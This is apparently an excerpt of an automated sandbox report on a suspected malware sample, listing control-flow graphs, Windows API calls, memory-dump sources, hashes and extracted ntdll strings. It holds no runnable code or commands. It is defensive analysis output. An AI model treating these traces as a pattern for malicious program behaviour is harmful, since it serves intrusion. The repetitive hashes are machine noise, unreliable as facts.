                                                              • Opcode ID: e2c4a59f123676b9ce178b71a1fe8acbab5cde539e6a4151e4124a48c2605df3
                                                              • Instruction ID: a6c55576fd2ed949c08aa582d1969cdd8c5147f99dc1fe1b43b8099428cdbfc7
                                                              • Opcode Fuzzy Hash: e2c4a59f123676b9ce178b71a1fe8acbab5cde539e6a4151e4124a48c2605df3
                                                              • Instruction Fuzzy Hash: 1021E3B5D11208DFDB10CFAAD584ADEBBF4EB48314F14806AE918B3351D378A954CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 350 248d6b9-248d6be 351 248d6c0-248d754 DuplicateHandle 350->351 352 248d75d-248d77a 351->352 353 248d756-248d75c 351->353 353->352
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0248D686,?,?,?,?,?), ref: 0248D747
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: a3da8c51f4c941ab96345d4e8f033bb2b6976645144d9473fa7abf4f497f4774
                                                              • Instruction ID: ad216cd7370574da9664218bafd40f37407af274ce90f8f080bb608ecc5316ce
                                                              • Opcode Fuzzy Hash: a3da8c51f4c941ab96345d4e8f033bb2b6976645144d9473fa7abf4f497f4774
                                                              • Instruction Fuzzy Hash: 9E21D2B5D012089FDB10CFAAD584ADEBBF4EB48314F14801AE914A3351D378A944CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 356 248b3e0-248b420 357 248b428-248b453 GetModuleHandleW 356->357 358 248b422-248b425 356->358 359 248b45c-248b470 357->359 360 248b455-248b45b 357->360 358->357 360->359
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0248B446
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 91e195457ebde4b1ef4c6385c408c45cb35bb9968321d4ecf6ffedb5106a9594
                                                              • Instruction ID: 4a26b035fac3a213564d2574c77c36a2a0a00a77b23edb26845985a7aa876d67
                                                              • Opcode Fuzzy Hash: 91e195457ebde4b1ef4c6385c408c45cb35bb9968321d4ecf6ffedb5106a9594
                                                              • Instruction Fuzzy Hash: B8110FB6C002498FDB20DF9AC444A9EFBF4EB88218F10842AD829B7201C379A545CFA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 362 67c1b07-67c266d CloseHandle 364 67c266f-67c2675 362->364 365 67c2676-67c269e 362->365 364->365
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,067C24B9,?,?), ref: 067C2660
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 43d0c610b646485bc2de5012a977c8049449e04a8c13017bc6ff65e06465f85e
                                                              • Instruction ID: 2b586487469080c0cfa9184b8677928776c7e1430117b90479e387367e2129b6
                                                              • Opcode Fuzzy Hash: 43d0c610b646485bc2de5012a977c8049449e04a8c13017bc6ff65e06465f85e
                                                              • Instruction Fuzzy Hash: B41189B5C04308CFCB10DF99C484BDEBBF4EB58320F148019D868A3242D734A644CBA4

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 368 67c1b14-67c266d CloseHandle 370 67c266f-67c2675 368->370 371 67c2676-67c269e 368->371 370->371
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,067C24B9,?,?), ref: 067C2660
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 74c96d9e248b3bcc3b387380f862ddc504391d4553ec52c3c387fffde4914a49
                                                              • Instruction ID: 5719436b1f5095552e087f0aff8ef7fa861803e673615ff1556ebc50a20316f4
                                                              • Opcode Fuzzy Hash: 74c96d9e248b3bcc3b387380f862ddc504391d4553ec52c3c387fffde4914a49
                                                              • Instruction Fuzzy Hash: 5F1134B1800608CFDB20DF9AC444B9EBBF4EB48320F108419D968A7641D338AA44CBA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 374 67c2600-67c266d CloseHandle 375 67c266f-67c2675 374->375 376 67c2676-67c269e 374->376 375->376
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,067C24B9,?,?), ref: 067C2660
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 4ac7e7a5a0560ea4e24be7cf000c1967d0dce688514e1607d2e62326528bc85c
                                                              • Instruction ID: 611e60088dcbb84c210c4c1626d8dae130d90c6be90199b7c645f6773585fe04
                                                              • Opcode Fuzzy Hash: 4ac7e7a5a0560ea4e24be7cf000c1967d0dce688514e1607d2e62326528bc85c
                                                              • Instruction Fuzzy Hash: BC1136B5D00349CFDB20CF99C545BDEBBF4EB48320F14846AD868A7641D338A645CFA5

                                                              Execution Graph

                                                              Execution Coverage:1.2%
                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                              Signature Coverage:8.3%
                                                              Total number of Nodes:132
                                                              Total number of Limit Nodes:10

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 517 417813-41783c call 42f3b3 520 417842-417850 call 42f9b3 517->520 521 41783e-417841 517->521 524 417860-417871 call 42de53 520->524 525 417852-41785d call 42fc53 520->525 530 417873-417887 LdrLoadDll 524->530 531 41788a-41788d 524->531 525->524 530->531
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417885
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                              • Instruction ID: 05a5680942dabe8a321efdcf2b6f82430579c081dca23c65dcb556c1d755013b
                                                              • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                              • Instruction Fuzzy Hash: 8A0152B1E4010DB7DB10EAA1DC42FDEB3789B14308F4081A6E90897240F674EB48CB95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 537 42c743-42c779 call 404583 call 42d943 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C774
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                              • Instruction ID: 9e0658677882e74928744a82f9e72dba2eb639633bc470e9b9a98b36903aceda
                                                              • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                              • Instruction Fuzzy Hash: 63E04F752002147BC610EA5AEC41E9B775CDFC5724F004419FA48A7241CA75BA11C6A4
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e387755376a784b68fdc7a6ea670e5b6dc14e94db05f839ef27a5f08da7a75d4
                                                              • Instruction ID: 49507d41a2c41417013409a2b8a43c7e2630286e3e28e15953ecad8202877881
                                                              • Opcode Fuzzy Hash: e387755376a784b68fdc7a6ea670e5b6dc14e94db05f839ef27a5f08da7a75d4
                                                              • Instruction Fuzzy Hash: 4490026320241003410571984415616408AA7E1211B59C421E1014994DCA6589916225
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4d4f2e63c09b76b3fecae46bd644940179ec32dc42b9a9070fe70391bab6b7c5
                                                              • Instruction ID: d0e498f4c4ed81dab651dbdcd76e70d8c6c27462aae41ed5873ea9d73c9e549b
                                                              • Opcode Fuzzy Hash: 4d4f2e63c09b76b3fecae46bd644940179ec32dc42b9a9070fe70391bab6b7c5
                                                              • Instruction Fuzzy Hash: 6190023320141413D111719845057070089A7D1251F99C812E042495CDDB968A52A221
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 58fef2394b12cbdb2de877cc1da80abace641805ab6a15542c8f1b140ac7e306
                                                              • Instruction ID: 5d50df8cbbee2b2bda7aba468b2dc41503c7f9fb2553242b7c26a2e61193905f
                                                              • Opcode Fuzzy Hash: 58fef2394b12cbdb2de877cc1da80abace641805ab6a15542c8f1b140ac7e306
                                                              • Instruction Fuzzy Hash: 1A90023320149802D1107198840574A0085A7D1311F5DC811E4424A5CDCBD589917221
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f68158959e1618102f68221b5d6e42e58eb3dfc90dea200d8e2e4ced8788f920
                                                              • Instruction ID: a99eb259b985fbca9ff4af18ac9811caae9022af6ffa0c0908f25582513d86bf
                                                              • Opcode Fuzzy Hash: f68158959e1618102f68221b5d6e42e58eb3dfc90dea200d8e2e4ced8788f920
                                                              • Instruction Fuzzy Hash: 7B90023360551402D100719845157061085A7D1211F69C811E042496CDCBD58A5166A2

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 132 414119-414120 133 414122-414129 132->133 134 4140a6-4140b4 132->134 137 41412b-41412f 133->137 135 4140ba-4140f1 call 4044f3 call 424f53 134->135 136 4140b5 call 417813 134->136 149 414113-414118 135->149 150 4140f3-414104 PostThreadMessageW 135->150 136->135 139 414131-414136 137->139 140 41414d-414153 137->140 139->140 143 414138-41413d 139->143 140->137 141 414155-414158 140->141 143->140 144 41413f-414146 143->144 146 414159-41415c 144->146 147 414148-41414b 144->147 147->140 147->146 150->149 151 414106-414110 150->151 151->149
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: c6518daae546de9adca5e6c6ca355c75d1bb2b16d27b4bf47e46c483232480bd
                                                              • Instruction ID: 26a48773d49b5d4830db5d6a3abe6c0441e01ffa8e7dd764610f6d3443abad5e
                                                              • Opcode Fuzzy Hash: c6518daae546de9adca5e6c6ca355c75d1bb2b16d27b4bf47e46c483232480bd
                                                              • Instruction Fuzzy Hash: F5117B31D0024879EB309E708C05FEF6B654BD2764F48829AFE14AB3D2D77949C28788

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 152 41406f-414070 153 414072-41407a 152->153 154 41408f-4140f1 call 42e873 call 42f283 call 417813 call 4044f3 call 424f53 152->154 165 414113-414118 154->165 166 4140f3-414104 PostThreadMessageW 154->166 166->165 167 414106-414110 166->167 167->165
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: 8d5fe0c3c9cdc8e49817f3f7c81564a0f05defde10c584dc7b50df3ffdad5cdd
                                                              • Instruction ID: 0f7a8f7452082f141b53ab21a3766a0a1486675bc0825100db931c7ccd50f644
                                                              • Opcode Fuzzy Hash: 8d5fe0c3c9cdc8e49817f3f7c81564a0f05defde10c584dc7b50df3ffdad5cdd
                                                              • Instruction Fuzzy Hash: BA01DF32E4521876E7209791AC02FDEB7689F81B14F40815AFF147B381D6795A0247D9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 168 41407c-414093 170 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 168->170 171 414097 call 42e873 168->171 180 414113-414118 170->180 181 4140f3-414104 PostThreadMessageW 170->181 171->170 181->180 182 414106-414110 181->182 182->180
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: f97a2dbf0e9be62fbf43441762b2e807058933e57bce9d2d8aa05f467568e6ba
                                                              • Instruction ID: 087d0fd33435a02eb29b34bb39c81c2954cd161ddf22aaec2d78f1b904196256
                                                              • Opcode Fuzzy Hash: f97a2dbf0e9be62fbf43441762b2e807058933e57bce9d2d8aa05f467568e6ba
                                                              • Instruction Fuzzy Hash: 9E112F31E40218B6EB2197E18C02FDF7B7C8F81B44F408069FA047B2C1D7B85A0687E5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 183 414083-414093 184 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 183->184 185 414097 call 42e873 183->185 194 414113-414118 184->194 195 4140f3-414104 PostThreadMessageW 184->195 185->184 195->194 196 414106-414110 195->196 196->194
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: e6ba9eb905182b9ec34c9235bf651bffb639cd546324c055ce8da76e89865faa
                                                              • Instruction ID: 5cdb5b93b2f758ed905246f69099698f9d56dcfdbf049b8bc6d5a2d33433c103
                                                              • Opcode Fuzzy Hash: e6ba9eb905182b9ec34c9235bf651bffb639cd546324c055ce8da76e89865faa
                                                              • Instruction Fuzzy Hash: FA012B31D40218B6EB20A7E18C02FDF7B7C8F81B44F008059FA047B2C1D7B8560687E9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 472 42ca93-42cad1 call 404583 call 42d943 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CACC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: neA
                                                              • API String ID: 3298025750-2757349852
                                                              • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                              • Instruction ID: 9121e88aff0d49045895fe5efa263953fc4bc90d71136d3efce1da578365df1c
                                                              • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                              • Instruction Fuzzy Hash: 45E092B22042147BD610EF59EC41E9B37ADEFC8710F004419FE09A7242C771B9108BB4

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 532 42ca53-42ca91 call 404583 call 42d943 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E604,?,?,00000000,?,0041E604,?,?,?), ref: 0042CA8C
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                              • Instruction ID: 2033942cd3b101f58bf4d77c2136ec80b735e96d56796e01d22862b954715158
                                                              • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                              • Instruction Fuzzy Hash: 7CE06DB12442047BDA10EE59EC42E9B37ADDFC4710F004419FA08A7241DA71B95087B4
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,53EC9B57,?,?,53EC9B57), ref: 0042CB07
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: e026587fc2ca3ee475d83143d77eba9ec23cbd0096a79b0590467f2d36563e8f
                                                              • Instruction ID: 4f7d0579f0d3a644c73c2585b10cf1452984b28a7a8af53eb300c7de9d046712
                                                              • Opcode Fuzzy Hash: e026587fc2ca3ee475d83143d77eba9ec23cbd0096a79b0590467f2d36563e8f
                                                              • Instruction Fuzzy Hash: CBE046722002147BC620AA6AEC05F9BB76CDBC5724F00441AFB0CAB282DA75BA0187A4
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 73a7da0b9726624f05570fd9b0dffb3a7524c8ec29f26215bfac411abd1eec90
                                                              • Instruction ID: 5c3d6b71e6925bc8e1553948165ea8800bf553775c93212eb37b81c4e41e2c7b
                                                              • Opcode Fuzzy Hash: 73a7da0b9726624f05570fd9b0dffb3a7524c8ec29f26215bfac411abd1eec90
                                                              • Instruction Fuzzy Hash: DAB09B739015D5D6EA12E7A4460971B794077D1715F29C461D3030A45F4778C1D1E275
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 4435f38c0a41c2b897add365439d9e0bd15f21fce532626e45f687fdf967654f
                                                              • Instruction ID: 2b4d3c7abe67a87184204e65ecb610cb21cbc106c77bf539cb21be563db15a04
                                                              • Opcode Fuzzy Hash: 4435f38c0a41c2b897add365439d9e0bd15f21fce532626e45f687fdf967654f
                                                              • Instruction Fuzzy Hash: 1A928E71608342EFE761CF29C890B6BB7E8BB84754F14481EFA95DB261D770E844CB92
                                                              Strings
                                                              • 8, xrefs: 015452E3
                                                              • Thread identifier, xrefs: 0154553A
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0154540A, 01545496, 01545519
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015454CE
                                                              • undeleted critical section in freed memory, xrefs: 0154542B
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01545543
                                                              • Critical section debug info address, xrefs: 0154541F, 0154552E
                                                              • Critical section address, xrefs: 01545425, 015454BC, 01545534
                                                              • Invalid debug info address of this critical section, xrefs: 015454B6
                                                              • corrupted critical section, xrefs: 015454C2
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015454E2
                                                              • double initialized or corrupted critical section, xrefs: 01545508
                                                              • Critical section address., xrefs: 01545502
                                                              • Address of the debug info found in the active list., xrefs: 015454AE, 015454FA
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              Strings
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0154261F
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01542412
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015422E4
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01542498
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01542624
                                                              • @, xrefs: 0154259B
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01542602
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01542409
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015424C0
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015425EB
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01542506
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              Strings
                                                              • VerifierDebug, xrefs: 01558CA5
                                                              • HandleTraces, xrefs: 01558C8F
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01558B8F
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01558A3D
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01558A67
                                                              • VerifierDlls, xrefs: 01558CBD
                                                              • VerifierFlags, xrefs: 01558C50
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              Strings
                                                              Similarity
                                                              • API ID:
